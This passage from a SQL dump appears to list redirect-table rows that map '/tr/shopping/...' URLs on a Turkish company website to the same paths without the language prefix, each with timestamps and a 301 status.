00:00:00',301),(70613,'https://3s-technologies.com.tr/tr/shopping/acanthaceous/900491548.html',NULL,'https://3s-technologies.com.tr/shopping/acanthaceous/900491548.html','',1,0,'2026-06-11 02:36:11','0000-00-00 00:00:00',301),(70614,'https://3s-technologies.com.tr/tr/shopping/entomological/392303617.html',NULL,'https://3s-technologies.com.tr/shopping/entomological/392303617.html','',1,0,'2026-06-11 02:36:14','0000-00-00 00:00:00',301),(70615,'https://3s-technologies.com.tr/tr/shopping/lagan/3379449873.html',NULL,'https://3s-technologies.com.tr/shopping/lagan/3379449873.html','',1,0,'2026-06-11 02:36:17','0000-00-00 00:00:00',301),(70616,'https://3s-technologies.com.tr/tr/shopping/ruralized/2717738211.html',NULL,'https://3s-technologies.com.tr/shopping/ruralized/2717738211.html','',1,0,'2026-06-11 02:36:20','0000-00-00 00:00:00',301),(70617,'https://3s-technologies.com.tr/tr/shopping/tucker/1317595064.html',NULL,'https://3s-technologies.com.tr/shopping/tucker/1317595064.html','',1,0,'2026-06-11 02:36:23','0000-00-00 00:00:00',301),(70618,'https://3s-technologies.com.tr/tr/shopping/pedaries/1639939788.html',NULL,'https://3s-technologies.com.tr/shopping/pedaries/1639939788.html','',1,0,'2026-06-11 02:36:26','0000-00-00 00:00:00',301),(70619,'https://3s-technologies.com.tr/tr/shopping/umbonate/1010274785.html',NULL,'https://3s-technologies.com.tr/shopping/umbonate/1010274785.html','',1,0,'2026-06-11 02:36:29','0000-00-00 00:00:00',301),(70620,'https://3s-technologies.com.tr/tr/shopping/prinoides/2000133770.html',NULL,'https://3s-technologies.com.tr/shopping/prinoides/2000133770.html','',1,0,'2026-06-11 02:36:33','0000-00-00 00:00:00',301),(70621,'https://3s-technologies.com.tr/tr/shopping/redbellied/3356065702.html',NULL,'https://3s-technologies.com.tr/shopping/redbellied/3356065702.html','',1,0,'2026-06-11 02:36:36','0000-00-00 00:00:00',301),(70622,'https://3s-technologies.com.tr/tr/shopping/selflove/4268727068.html',NULL,'https://3s-technologies.com.tr/shopping/selflove/4268727068.html','',1,0,'2026-06-11 02:36:38','0000-00-00 00:00:00',301),(70623,'https://3s-technologies.com.tr/tr/shopping/lightsomeness/1461973057.html',NULL,'https://3s-technologies.com.tr/shopping/lightsomeness/1461973057.html','',1,0,'2026-06-11 02:36:41','0000-00-00 00:00:00',301),(70624,'https://3s-technologies.com.tr/tr/shopping/radicel/269640040.html',NULL,'https://3s-technologies.com.tr/shopping/radicel/269640040.html','',1,0,'2026-06-11 02:36:44','0000-00-00 00:00:00',301),(70625,'https://3s-technologies.com.tr/tr/shopping/upmarket/229454572.html',NULL,'https://3s-technologies.com.tr/shopping/upmarket/229454572.html','',1,0,'2026-06-11 02:36:47','0000-00-00 00:00:00',301),(70626,'https://3s-technologies.com.tr/tr/shopping/scrubstone/1761605434.html',NULL,'https://3s-technologies.com.tr/shopping/scrubstone/1761605434.html','',1,0,'2026-06-11 02:36:50','0000-00-00 00:00:00',301),(70627,'https://3s-technologies.com.tr/tr/shopping/inconvenient/3826068004.html',NULL,'https://3s-technologies.com.tr/shopping/inconvenient/3826068004.html','',1,0,'2026-06-11 02:36:53','0000-00-00 00:00:00',301),(70628,'https://3s-technologies.com.tr/tr/shopping/thanklessly/1173704925.html',NULL,'https://3s-technologies.com.tr/shopping/thanklessly/1173704925.html','',1,0,'2026-06-11 02:36:56','0000-00-00 00:00:00',301),(70629,'https://3s-technologies.com.tr/tr/shopping/dartboard/2768557697.html',NULL,'https://3s-technologies.com.tr/shopping/dartboard/2768557697.html','',1,0,'2026-06-11 02:36:59','0000-00-00 00:00:00',301),(70630,'https://3s-technologies.com.tr/tr/shopping/urgent/475490729.html',NULL,'https://3s-technologies.com.tr/shopping/urgent/475490729.html','',1,0,'2026-06-11 02:37:02','0000-00-00 00:00:00',301),(70631,'https://3s-technologies.com.tr/tr/shopping/riffraff/3870982095.html',NULL,'https://3s-technologies.com.tr/shopping/riffraff/3870982095.html','',1,0,'2026-06-11 02:37:07','0000-00-00 00:00:00',301),(70632,'https://3s-technologies.com.tr/tr/shopping/alcidae/3769655227.html',NULL,'https://3s-technologies.com.tr/shopping/alcidae/3769655227.html','',1,0,'2026-06-11 02:37:10','0000-00-00 00:00:00',301),(70633,'https://3s-technologies.com.tr/tr/shopping/tressel/2621577337.html',NULL,'https://3s-technologies.com.tr/shopping/tressel/2621577337.html','',1,0,'2026-06-11 02:37:13','0000-00-00 00:00:00',301),(70634,'https://3s-technologies.com.tr/tr/shopping/twattler/3540345851.html',NULL,'https://3s-technologies.com.tr/shopping/twattler/3540345851.html','',1,0,'2026-06-11 02:37:16','0000-00-00 00:00:00',301),(70635,'https://3s-technologies.com.tr/tr/shopping/lifemate/1674417793.html',NULL,'https://3s-technologies.com.tr/shopping/lifemate/1674417793.html','',1,0,'2026-06-11 02:37:19','0000-00-00 00:00:00',301),(70636,'https://3s-technologies.com.tr/tr/shopping/antimeres/384645732.html',NULL,'https://3s-technologies.com.tr/shopping/antimeres/384645732.html','',1,0,'2026-06-11 02:37:22','0000-00-00 00:00:00',301),(70637,'https://3s-technologies.com.tr/tr/shopping/hypnocyst/3618449340.html',NULL,'https://3s-technologies.com.tr/shopping/hypnocyst/3618449340.html','',1,0,'2026-06-11 02:37:25','0000-00-00 00:00:00',301),(70638,'https://3s-technologies.com.tr/tr/shopping/pometellus/1978497552.html',NULL,'https://3s-technologies.com.tr/shopping/pometellus/1978497552.html','',1,0,'2026-06-11 02:37:28','0000-00-00 00:00:00',301),(70639,'https://3s-technologies.com.tr/tr/shopping/telethermometer/1029658411.html',NULL,'https://3s-technologies.com.tr/shopping/telethermometer/1029658411.html','',1,0,'2026-06-11 02:37:31','0000-00-00 00:00:00',301),(70640,'https://3s-technologies.com.tr/tr/shopping/weatherbeaten/2629802422.html',NULL,'https://3s-technologies.com.tr/shopping/weatherbeaten/2629802422.html','',1,0,'2026-06-11 02:37:34','0000-00-00 00:00:00',301),(70641,'https://3s-technologies.com.tr/tr/shopping/parasceve/4151926870.html',NULL,'https://3s-technologies.com.tr/shopping/parasceve/4151926870.html','',1,0,'2026-06-11 02:37:37','0000-00-00 00:00:00',301),(70642,'https://3s-technologies.com.tr/tr/shopping/electrotonus/2795253834.html',NULL,'https://3s-technologies.com.tr/shopping/electrotonus/2795253834.html','',1,0,'2026-06-11 02:37:40','0000-00-00 00:00:00',301),(70643,'https://3s-technologies.com.tr/tr/shopping/anserinae/3173950294.html',NULL,'https://3s-technologies.com.tr/shopping/anserinae/3173950294.html','',1,0,'2026-06-11 02:37:43','0000-00-00 00:00:00',301),(70644,'https://3s-technologies.com.tr/tr/shopping/veddahs/1585803309.html',NULL,'https://3s-technologies.com.tr/shopping/veddahs/1585803309.html','',1,0,'2026-06-11 02:37:46','0000-00-00 00:00:00',301),(70645,'https://3s-technologies.com.tr/tr/shopping/vexed/1198353616.html',NULL,'https://3s-technologies.com.tr/shopping/vexed/1198353616.html','',1,0,'2026-06-11 02:37:49','0000-00-00 00:00:00',301),(70646,'https://3s-technologies.com.tr/tr/shopping/townhouse/2281807490.html',NULL,'https://3s-technologies.com.tr/shopping/townhouse/2281807490.html','',1,0,'2026-06-11 02:37:52','0000-00-00 00:00:00',301),(70647,'https://3s-technologies.com.tr/tr/shopping/foveae/2526136697.html',NULL,'https://3s-technologies.com.tr/shopping/foveae/2526136697.html','',1,0,'2026-06-11 02:37:55','0000-00-00 00:00:00',301),(70648,'https://3s-technologies.com.tr/tr/shopping/corrodent/2110362393.html',NULL,'https://3s-technologies.com.tr/shopping/corrodent/2110362393.html','',1,0,'2026-06-11 02:37:58','0000-00-00 00:00:00',301),(70649,'https://3s-technologies.com.tr/tr/shopping/glycosometer/3437709419.html',NULL,'https://3s-technologies.com.tr/shopping/glycosometer/3437709419.html','',1,0,'2026-06-11 02:38:01','0000-00-00 00:00:00',301),(70650,'https://3s-technologies.com.tr/tr/shopping/paradoxicalness/2400930823.html',NULL,'https://3s-technologies.com.tr/shopping/paradoxicalness/2400930823.html','',1,0,'2026-06-11 02:38:04','0000-00-00 00:00:00',301),(70651,'https://3s-technologies.com.tr/tr/shopping/transilience/1066830435.html',NULL,'https://3s-technologies.com.tr/shopping/transilience/1066830435.html','',1,0,'2026-06-11 02:38:07','0000-00-00 00:00:00',301),(70652,'https://3s-technologies.com.tr/tr/shopping/naphthalin/3691447502.html',NULL,'https://3s-technologies.com.tr/shopping/naphthalin/3691447502.html','',1,0,'2026-06-11 02:38:10','0000-00-00 00:00:00',301),(70653,'https://3s-technologies.com.tr/tr/shopping/monitress/4114283699.html',NULL,'https://3s-technologies.com.tr/shopping/monitress/4114283699.html','',1,0,'2026-06-11 02:38:13','0000-00-00 00:00:00',301),(70654,'https://3s-technologies.com.tr/tr/shopping/ligament/596411789.html',NULL,'https://3s-technologies.com.tr/shopping/ligament/596411789.html','',1,0,'2026-06-11 02:38:16','0000-00-00 00:00:00',301),(70655,'https://3s-technologies.com.tr/tr/shopping/lingua/1947348613.html',NULL,'https://3s-technologies.com.tr/shopping/lingua/1947348613.html','',1,0,'2026-06-11 02:38:19','0000-00-00 00:00:00',301),(70656,'https://3s-technologies.com.tr/tr/shopping/expectorate/3814956267.html',NULL,'https://3s-technologies.com.tr/shopping/expectorate/3814956267.html','',1,0,'2026-06-11 02:38:22','0000-00-00 00:00:00',301),(70657,'https://3s-technologies.com.tr/tr/shopping/crowed/3777313080.html',NULL,'https://3s-technologies.com.tr/shopping/crowed/3777313080.html','',1,0,'2026-06-11 02:38:25','0000-00-00 00:00:00',301),(70658,'https://3s-technologies.com.tr/tr/shopping/bedclothes/2114622939.html',NULL,'https://3s-technologies.com.tr/shopping/bedclothes/2114622939.html','',1,0,'2026-06-11 02:38:28','0000-00-00 00:00:00',301),(70659,'https://3s-technologies.com.tr/tr/shopping/narinari/1729501359.html',NULL,'https://3s-technologies.com.tr/shopping/narinari/1729501359.html','',1,0,'2026-06-11 02:38:31','0000-00-00 00:00:00',301),(70660,'https://3s-technologies.com.tr/tr/shopping/superdreadnought/3276255279.html',NULL,'https://3s-technologies.com.tr/shopping/superdreadnought/3276255279.html','',1,0,'2026-06-11 02:38:34','0000-00-00 00:00:00',301),(70661,'https://3s-technologies.com.tr/tr/shopping/indigestibly/2944220599.html',NULL,'https://3s-technologies.com.tr/shopping/indigestibly/2944220599.html','',1,0,'2026-06-11 02:38:37','0000-00-00 00:00:00',301),(70662,'https://3s-technologies.com.tr/tr/shopping/deicide/1024434953.html',NULL,'https://3s-technologies.com.tr/shopping/deicide/1024434953.html','',1,0,'2026-06-11 02:38:40','0000-00-00 00:00:00',301),(70663,'https://3s-technologies.com.tr/tr/shopping/uproariously/2345376142.html',NULL,'https://3s-technologies.com.tr/shopping/uproariously/2345376142.html','',1,0,'2026-06-11 02:38:43','0000-00-00 00:00:00',301),(70664,'https://3s-technologies.com.tr/tr/shopping/spooler/186666141.html',NULL,'https://3s-technologies.com.tr/shopping/spooler/186666141.html','',1,0,'2026-06-11 02:38:46','0000-00-00 00:00:00',301),(70665,'https://3s-technologies.com.tr/tr/shopping/ebola/2396342035.html',NULL,'https://3s-technologies.com.tr/shopping/ebola/2396342035.html','',1,0,'2026-06-11 02:38:49','0000-00-00 00:00:00',301),(70666,'https://3s-technologies.com.tr/tr/shopping/atrioventricular/4128002456.html',NULL,'https://3s-technologies.com.tr/shopping/atrioventricular/4128002456.html','',1,0,'2026-06-11 02:38:52','0000-00-00 00:00:00',301),(70667,'https://3s-technologies.com.tr/tr/shopping/revertent/1683729172.html',NULL,'https://3s-technologies.com.tr/shopping/revertent/1683729172.html','',1,0,'2026-06-11 02:38:55','0000-00-00 00:00:00',301),(70668,'https://3s-technologies.com.tr/tr/shopping/prelation/2251011583.html',NULL,'https://3s-technologies.com.tr/shopping/prelation/2251011583.html','',1,0,'2026-06-11 02:38:58','0000-00-00 00:00:00',301),(70669,'https://3s-technologies.com.tr/tr/shopping/exploration/2463165823.html',NULL,'https://3s-technologies.com.tr/shopping/exploration/2463165823.html','',1,0,'2026-06-11 02:39:02','0000-00-00 00:00:00',301),(70670,'https://3s-technologies.com.tr/tr/shopping/perchant/687224650.html',NULL,'https://3s-technologies.com.tr/shopping/perchant/687224650.html','',1,0,'2026-06-11 02:39:04','0000-00-00 00:00:00',301),(70671,'https://3s-technologies.com.tr/tr/shopping/tributarily/3896073200.html',NULL,'https://3s-technologies.com.tr/shopping/tributarily/3896073200.html','',1,0,'2026-06-11 02:39:07','0000-00-00 00:00:00',301),(70672,'https://3s-technologies.com.tr/tr/shopping/shoot/2881249725.html',NULL,'https://3s-technologies.com.tr/shopping/shoot/2881249725.html','',1,0,'2026-06-11 02:39:10','0000-00-00 00:00:00',301),(70673,'https://3s-technologies.com.tr/tr/shopping/indefinite/426562911.html',NULL,'https://3s-technologies.com.tr/shopping/indefinite/426562911.html','',1,0,'2026-06-11 02:39:14','0000-00-00 00:00:00',301),(70674,'https://3s-technologies.com.tr/tr/shopping/mucigen/1028446296.html',NULL,'https://3s-technologies.com.tr/shopping/mucigen/1028446296.html','',1,0,'2026-06-11 02:39:16','0000-00-00 00:00:00',301),(70675,'https://3s-technologies.com.tr/tr/shopping/innocency/1031986524.html',NULL,'https://3s-technologies.com.tr/shopping/innocency/1031986524.html','',1,0,'2026-06-11 02:39:19','0000-00-00 00:00:00',301),(70676,'https://3s-technologies.com.tr/tr/shopping/pegmatite/1477895611.html',NULL,'https://3s-technologies.com.tr/shopping/pegmatite/1477895611.html','',1,0,'2026-06-11 02:39:23','0000-00-00 00:00:00',301),(70677,'https://3s-technologies.com.tr/tr/shopping/exegetic/2475641935.html',NULL,'https://3s-technologies.com.tr/shopping/exegetic/2475641935.html','',1,0,'2026-06-11 02:39:25','0000-00-00 00:00:00',301),(70678,'https://3s-technologies.com.tr/tr/shopping/spaded/30965848.html',NULL,'https://3s-technologies.com.tr/shopping/spaded/30965848.html','',1,0,'2026-06-11 02:39:29','0000-00-00 00:00:00',301),(70679,'https://3s-technologies.com.tr/tr/shopping/hogcote/4161290905.html',NULL,'https://3s-technologies.com.tr/shopping/hogcote/4161290905.html','',1,0,'2026-06-11 02:39:31','0000-00-00 00:00:00',301),(70680,'https://3s-technologies.com.tr/tr/shopping/proglottides/2707279424.html',NULL,'https://3s-technologies.com.tr/shopping/proglottides/2707279424.html','',1,0,'2026-06-11 02:39:36','0000-00-00 00:00:00',301),(70681,'https://3s-technologies.com.tr/tr/shopping/clayes/835690131.html',NULL,'https://3s-technologies.com.tr/shopping/clayes/835690131.html','',1,0,'2026-06-11 02:39:39','0000-00-00 00:00:00',301),(70682,'https://3s-technologies.com.tr/tr/shopping/darnaliscus/691735285.html',NULL,'https://3s-technologies.com.tr/shopping/darnaliscus/691735285.html','',1,0,'2026-06-11 02:39:42','0000-00-00 00:00:00',301),(70683,'https://3s-technologies.com.tr/tr/shopping/stricture/1429744634.html',NULL,'https://3s-technologies.com.tr/shopping/stricture/1429744634.html','',1,0,'2026-06-11 02:39:45','0000-00-00 00:00:00',301),(70684,'https://3s-technologies.com.tr/tr/shopping/dolma/1580192886.html',NULL,'https://3s-technologies.com.tr/shopping/dolma/1580192886.html','',1,0,'2026-06-11 02:39:51','0000-00-00 00:00:00',301),(70685,'https://3s-technologies.com.tr/tr/shopping/holily/456799276.html',NULL,'https://3s-technologies.com.tr/shopping/holily/456799276.html','',1,0,'2026-06-11 02:39:54','0000-00-00 00:00:00',301),(70686,'https://3s-technologies.com.tr/tr/shopping/venerable/2372619364.html',NULL,'https://3s-technologies.com.tr/shopping/venerable/2372619364.html','',1,0,'2026-06-11 02:39:57','0000-00-00 00:00:00',301),(70687,'https://3s-technologies.com.tr/tr/shopping/frigg/1180007489.html',NULL,'https://3s-technologies.com.tr/shopping/frigg/1180007489.html','',1,0,'2026-06-11 02:40:00','0000-00-00 00:00:00',301),(70688,'https://3s-technologies.com.tr/tr/shopping/thinolite/3568166518.html',NULL,'https://3s-technologies.com.tr/shopping/thinolite/3568166518.html','',1,0,'2026-06-11 02:40:03','0000-00-00 00:00:00',301),(70689,'https://3s-technologies.com.tr/tr/shopping/veracious/1882693651.html',NULL,'https://3s-technologies.com.tr/shopping/veracious/1882693651.html','',1,0,'2026-06-11 02:40:06','0000-00-00 00:00:00',301),(70690,'https://3s-technologies.com.tr/tr/shopping/indecorousness/3642328330.html',NULL,'https://3s-technologies.com.tr/shopping/indecorousness/3642328330.html','',1,0,'2026-06-11 02:40:09','0000-00-00 00:00:00',301),(70691,'https://3s-technologies.com.tr/tr/shopping/muriatic/1397249809.html',NULL,'https://3s-technologies.com.tr/shopping/muriatic/1397249809.html','',1,0,'2026-06-11 02:40:12','0000-00-00 00:00:00',301),(70692,'https://3s-technologies.com.tr/tr/shopping/dilative/2668398084.html',NULL,'https://3s-technologies.com.tr/shopping/dilative/2668398084.html','',1,0,'2026-06-11 02:40:15','0000-00-00 00:00:00',301),(70693,'https://3s-technologies.com.tr/tr/shopping/tentacle/238344841.html',NULL,'https://3s-technologies.com.tr/shopping/tentacle/238344841.html','',1,0,'2026-06-11 02:40:18','0000-00-00 00:00:00',301),(70694,'https://3s-technologies.com.tr/tr/shopping/darted/721327609.html',NULL,'https://3s-technologies.com.tr/shopping/darted/721327609.html','',1,0,'2026-06-11 02:40:21','0000-00-00 00:00:00',301),(70695,'https://3s-technologies.com.tr/tr/shopping/candidiasis/3725051169.html',NULL,'https://3s-technologies.com.tr/shopping/candidiasis/3725051169.html','',1,0,'2026-06-11 02:40:24','0000-00-00 00:00:00',301),(70696,'https://3s-technologies.com.tr/tr/shopping/interleaved/1672331356.html',NULL,'https://3s-technologies.com.tr/shopping/interleaved/1672331356.html','',1,0,'2026-06-11 02:40:27','0000-00-00 00:00:00',301),(70697,'https://3s-technologies.com.tr/tr/shopping/managerial/1957160859.html',NULL,'https://3s-technologies.com.tr/shopping/managerial/1957160859.html','',1,0,'2026-06-11 02:40:30','0000-00-00 00:00:00',301),(70698,'https://3s-technologies.com.tr/tr/shopping/pleas/586376101.html',NULL,'https://3s-technologies.com.tr/shopping/pleas/586376101.html','',1,0,'2026-06-11 02:40:33','0000-00-00 00:00:00',301),(70699,'https://3s-technologies.com.tr/tr/shopping/concitation/4047676528.html',NULL,'https://3s-technologies.com.tr/shopping/concitation/4047676528.html','',1,0,'2026-06-11 02:40:36','0000-00-00 00:00:00',301),(70700,'https://3s-technologies.com.tr/tr/shopping/perfidy/4029976116.html',NULL,'https://3s-technologies.com.tr/shopping/perfidy/4029976116.html','',1,0,'2026-06-11 02:40:39','0000-00-00 00:00:00',301),(70701,'https://3s-technologies.com.tr/tr/shopping/institutes/2519854466.html',NULL,'https://3s-technologies.com.tr/shopping/institutes/2519854466.html','',1,0,'2026-06-11 02:40:42','0000-00-00 00:00:00',301),(70702,'https://3s-technologies.com.tr/tr/shopping/preaxial/895353098.html',NULL,'https://3s-technologies.com.tr/shopping/preaxial/895353098.html','',1,0,'2026-06-11 02:40:47','0000-00-00 00:00:00',301),(70703,'https://3s-technologies.com.tr/tr/shopping/tunefulness/753562842.html',NULL,'https://3s-technologies.com.tr/shopping/tunefulness/753562842.html','',1,0,'2026-06-11 02:40:51','0000-00-00 00:00:00',301),(70704,'https://3s-technologies.com.tr/tr/shopping/armory/1252082864.html',NULL,'https://3s-technologies.com.tr/shopping/armory/1252082864.html','',1,0,'2026-06-11 02:40:54','0000-00-00 00:00:00',301),(70705,'https://3s-technologies.com.tr/tr/shopping/knubs/2011630072.html',NULL,'https://3s-technologies.com.tr/shopping/knubs/2011630072.html','',1,0,'2026-06-11 02:40:57','0000-00-00 00:00:00',301),(70706,'https://3s-technologies.com.tr/tr/shopping/lythrum/1565734003.html',NULL,'https://3s-technologies.com.tr/shopping/lythrum/1565734003.html','',1,0,'2026-06-11 02:41:00','0000-00-00 00:00:00',301),(70707,'https://3s-technologies.com.tr/tr/shopping/amess/539470000.html',NULL,'https://3s-technologies.com.tr/shopping/amess/539470000.html','',1,0,'2026-06-11 02:41:03','0000-00-00 00:00:00',301),(70708,'https://3s-technologies.com.tr/tr/shopping/megapodius/400259707.html',NULL,'https://3s-technologies.com.tr/shopping/megapodius/400259707.html','',1,0,'2026-06-11 02:41:06','0000-00-00 00:00:00',301),(70709,'https://3s-technologies.com.tr/tr/shopping/brimmer/1811957022.html',NULL,'https://3s-technologies.com.tr/shopping/brimmer/1811957022.html','',1,0,'2026-06-11 02:41:09','0000-00-00 00:00:00',301),(70710,'https://3s-technologies.com.tr/tr/shopping/thwarter/4241644776.html',NULL,'https://3s-technologies.com.tr/shopping/thwarter/4241644776.html','',1,0,'2026-06-11 02:41:12','0000-00-00 00:00:00',301),(70711,'https://3s-technologies.com.tr/tr/shopping/catchdrain/2684271651.html',NULL,'https://3s-technologies.com.tr/shopping/catchdrain/2684271651.html','',1,0,'2026-06-11 02:41:15','0000-00-00 00:00:00',301),(70712,'https://3s-technologies.com.tr/tr/shopping/deliciously/2362143897.html',NULL,'https://3s-technologies.com.tr/shopping/deliciously/2362143897.html','',1,0,'2026-06-11 02:41:18','0000-00-00 00:00:00',301),(70713,'https://3s-technologies.com.tr/tr/shopping/lawrence/2770319064.html',NULL,'https://3s-technologies.com.tr/shopping/lawrence/2770319064.html','',1,0,'2026-06-11 02:41:21','0000-00-00 00:00:00',301),(70714,'https://3s-technologies.com.tr/tr/shopping/devilwood/972180800.html',NULL,'https://3s-technologies.com.tr/shopping/devilwood/972180800.html','',1,0,'2026-06-11 02:41:24','0000-00-00 00:00:00',301),(70715,'https://3s-technologies.com.tr/tr/shopping/unsight/1371765755.html',NULL,'https://3s-technologies.com.tr/shopping/unsight/1371765755.html','',1,0,'2026-06-11 02:41:27','0000-00-00 00:00:00',301),(70716,'https://3s-technologies.com.tr/tr/shopping/sadda/1354065359.html',NULL,'https://3s-technologies.com.tr/shopping/sadda/1354065359.html','',1,0,'2026-06-11 02:41:30','0000-00-00 00:00:00',301),(70717,'https://3s-technologies.com.tr/tr/shopping/lastingness/3831482784.html',NULL,'https://3s-technologies.com.tr/shopping/lastingness/3831482784.html','',1,0,'2026-06-11 02:41:34','0000-00-00 00:00:00',301),(70718,'https://3s-technologies.com.tr/tr/shopping/mineralizing/309044610.html',NULL,'https://3s-technologies.com.tr/shopping/mineralizing/309044610.html','',1,0,'2026-06-11 02:41:36','0000-00-00 00:00:00',301),(70719,'https://3s-technologies.com.tr/tr/shopping/gabionage/1209687366.html',NULL,'https://3s-technologies.com.tr/shopping/gabionage/1209687366.html','',1,0,'2026-06-11 02:41:39','0000-00-00 00:00:00',301),(70720,'https://3s-technologies.com.tr/tr/shopping/agrypnotic/3692082156.html',NULL,'https://3s-technologies.com.tr/shopping/agrypnotic/3692082156.html','',1,0,'2026-06-11 02:41:46','0000-00-00 00:00:00',301),(70721,'https://3s-technologies.com.tr/tr/shopping/councillor/4100903096.html',NULL,'https://3s-technologies.com.tr/shopping/councillor/4100903096.html','',1,0,'2026-06-11 02:41:56','0000-00-00 00:00:00',301),(70722,'https://3s-technologies.com.tr/tr/shopping/sothe/3161405070.html',NULL,'https://3s-technologies.com.tr/shopping/sothe/3161405070.html','',1,0,'2026-06-11 02:42:01','0000-00-00 00:00:00',301),(70723,'https://3s-technologies.com.tr/tr/shopping/sightful/3060556505.html',NULL,'https://3s-technologies.com.tr/shopping/sightful/3060556505.html','',1,0,'2026-06-11 02:42:04','0000-00-00 00:00:00',301),(70724,'https://3s-technologies.com.tr/tr/shopping/vitalization/2934380224.html',NULL,'https://3s-technologies.com.tr/shopping/vitalization/2934380224.html','',1,0,'2026-06-11 02:42:07','0000-00-00 00:00:00',301),(70725,'https://3s-technologies.com.tr/tr/shopping/incommutably/604596093.html',NULL,'https://3s-technologies.com.tr/shopping/incommutably/604596093.html','',1,0,'2026-06-11 02:42:10','0000-00-00 00:00:00',301),(70726,'https://3s-technologies.com.tr/tr/shopping/carrancha/2590554219.html',NULL,'https://3s-technologies.com.tr/shopping/carrancha/2590554219.html','',1,0,'2026-06-11 02:42:13','0000-00-00 00:00:00',301),(70727,'https://3s-technologies.com.tr/tr/shopping/candor/378922998.html',NULL,'https://3s-technologies.com.tr/shopping/candor/378922998.html','',1,0,'2026-06-11 02:42:16','0000-00-00 00:00:00',301),(70728,'https://3s-technologies.com.tr/tr/shopping/factum/883279351.html',NULL,'https://3s-technologies.com.tr/shopping/factum/883279351.html','',1,0,'2026-06-11 02:42:19','0000-00-00 00:00:00',301),(70729,'https://3s-technologies.com.tr/tr/shopping/lervia/3116325402.html',NULL,'https://3s-technologies.com.tr/shopping/lervia/3116325402.html','',1,0,'2026-06-11 02:42:22','0000-00-00 00:00:00',301),(70730,'https://3s-technologies.com.tr/tr/shopping/idolish/123354404.html',NULL,'https://3s-technologies.com.tr/shopping/idolish/123354404.html','',1,0,'2026-06-11 02:42:25','0000-00-00 00:00:00',301),(70731,'https://3s-technologies.com.tr/tr/shopping/helically/3729561804.html',NULL,'https://3s-technologies.com.tr/shopping/helically/3729561804.html','',1,0,'2026-06-11 02:42:28','0000-00-00 00:00:00',301),(70732,'https://3s-technologies.com.tr/tr/shopping/malheur/1899519725.html',NULL,'https://3s-technologies.com.tr/shopping/malheur/1899519725.html','',1,0,'2026-06-11 02:42:31','0000-00-00 00:00:00',301),(70733,'https://3s-technologies.com.tr/tr/shopping/safer/3803999846.html',NULL,'https://3s-technologies.com.tr/shopping/safer/3803999846.html','',1,0,'2026-06-11 02:42:34','0000-00-00 00:00:00',301),(70734,'https://3s-technologies.com.tr/tr/shopping/paideutics/1387600244.html',NULL,'https://3s-technologies.com.tr/shopping/paideutics/1387600244.html','',1,0,'2026-06-11 02:42:37','0000-00-00 00:00:00',301),(70735,'https://3s-technologies.com.tr/tr/shopping/stonegall/3800363565.html',NULL,'https://3s-technologies.com.tr/shopping/stonegall/3800363565.html','',1,0,'2026-06-11 02:42:40','0000-00-00 00:00:00',301),(70736,'https://3s-technologies.com.tr/tr/shopping/additionary/3315494111.html',NULL,'https://3s-technologies.com.tr/shopping/additionary/3315494111.html','',1,0,'2026-06-11 02:42:43','0000-00-00 00:00:00',301),(70737,'https://3s-technologies.com.tr/tr/shopping/untruth/1239074906.html',NULL,'https://3s-technologies.com.tr/shopping/untruth/1239074906.html','',1,0,'2026-06-11 02:42:46','0000-00-00 00:00:00',301),(70738,'https://3s-technologies.com.tr/tr/shopping/epiplexis/2294043918.html',NULL,'https://3s-technologies.com.tr/shopping/epiplexis/2294043918.html','',1,0,'2026-06-11 02:42:49','0000-00-00 00:00:00',301),(70739,'https://3s-technologies.com.tr/tr/shopping/orthopaedic/4159314902.html',NULL,'https://3s-technologies.com.tr/shopping/orthopaedic/4159314902.html','',1,0,'2026-06-11 02:42:52','0000-00-00 00:00:00',301),(70740,'https://3s-technologies.com.tr/tr/shopping/antig/941339485.html',NULL,'https://3s-technologies.com.tr/shopping/antig/941339485.html','',1,0,'2026-06-11 02:42:55','0000-00-00 00:00:00',301),(70741,'https://3s-technologies.com.tr/tr/shopping/boneidle/1720631391.html',NULL,'https://3s-technologies.com.tr/shopping/boneidle/1720631391.html','',1,0,'2026-06-11 02:42:58','0000-00-00 00:00:00',301),(70742,'https://3s-technologies.com.tr/tr/shopping/periphrastic/1542839885.html',NULL,'https://3s-technologies.com.tr/shopping/periphrastic/1542839885.html','',1,0,'2026-06-11 02:43:01','0000-00-00 00:00:00',301),(70743,'https://3s-technologies.com.tr/tr/shopping/adductive/356815649.html',NULL,'https://3s-technologies.com.tr/shopping/adductive/356815649.html','',1,0,'2026-06-11 02:43:04','0000-00-00 00:00:00',301),(70744,'https://3s-technologies.com.tr/tr/shopping/greater/2089688153.html',NULL,'https://3s-technologies.com.tr/shopping/greater/2089688153.html','',1,0,'2026-06-11 02:43:07','0000-00-00 00:00:00',301),(70745,'https://3s-technologies.com.tr/tr/shopping/mercurializing/805057747.html',NULL,'https://3s-technologies.com.tr/shopping/mercurializing/805057747.html','',1,0,'2026-06-11 02:43:10','0000-00-00 00:00:00',301),(70746,'https://3s-technologies.com.tr/tr/shopping/memento/1242741749.html',NULL,'https://3s-technologies.com.tr/shopping/memento/1242741749.html','',1,0,'2026-06-11 02:43:13','0000-00-00 00:00:00',301),(70747,'https://3s-technologies.com.tr/tr/shopping/legacies/1253294947.html',NULL,'https://3s-technologies.com.tr/shopping/legacies/1253294947.html','',1,0,'2026-06-11 02:43:16','0000-00-00 00:00:00',301),(70748,'https://3s-technologies.com.tr/tr/shopping/scauper/1458690763.html',NULL,'https://3s-technologies.com.tr/shopping/scauper/1458690763.html','',1,0,'2026-06-11 02:43:19','0000-00-00 00:00:00',301),(70749,'https://3s-technologies.com.tr/tr/shopping/olfactories/2616721376.html',NULL,'https://3s-technologies.com.tr/shopping/olfactories/2616721376.html','',1,0,'2026-06-11 02:43:22','0000-00-00 00:00:00',301),(70750,'https://3s-technologies.com.tr/tr/shopping/blastocoele/807600076.html',NULL,'https://3s-technologies.com.tr/shopping/blastocoele/807600076.html','',1,0,'2026-06-11 02:43:25','0000-00-00 00:00:00',301),(70751,'https://3s-technologies.com.tr/tr/shopping/lactage/1023857508.html',NULL,'https://3s-technologies.com.tr/shopping/lactage/1023857508.html','',1,0,'2026-06-11 02:43:28','0000-00-00 00:00:00',301),(70752,'https://3s-technologies.com.tr/tr/shopping/peculiarities/3971752491.html',NULL,'https://3s-technologies.com.tr/shopping/peculiarities/3971752491.html','',1,0,'2026-06-11 02:43:31','0000-00-00 00:00:00',301),(70753,'https://3s-technologies.com.tr/tr/shopping/meach/2991794115.html',NULL,'https://3s-technologies.com.tr/shopping/meach/2991794115.html','',1,0,'2026-06-11 02:43:34','0000-00-00 